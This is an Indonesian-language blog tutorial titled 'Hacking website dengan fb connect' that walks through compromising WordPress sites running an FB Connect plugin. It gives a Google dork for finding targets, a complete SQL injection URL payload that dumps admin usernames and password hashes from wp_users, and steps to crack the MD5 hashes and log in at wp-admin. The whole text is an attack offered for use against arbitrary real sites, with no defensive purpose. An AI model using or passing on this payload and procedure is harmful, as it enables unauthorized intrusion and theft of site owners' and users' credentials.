Hacking website dengan fb connect
by http://andi-techno.blogspot.com/
check this on:
Dork: inurl:"fbconnect_action=myhome"
- Buka Google, lalu masukkan dork diatas di kotak pencarian,
lalu search, nah akan muncul banyak situs yang akan menjadi target
- Klik situs Targetnya sob
- Sekarang ubah URL :
?fbconnect_action=myhome&userid=
- Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa
ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
- Sekarang keluar Username dan Password Admin.
passwordnya dalam bentu hash, jadi kamu perlu
men-decrypt nya dulu sob, cari saja di google cara decrypt md5 hash
-
Jika password telah di decrypt sekarang login menggunakan user name dan
password tersebut
tambahkan
/wp-admin.php dibelakang url situs target untuk login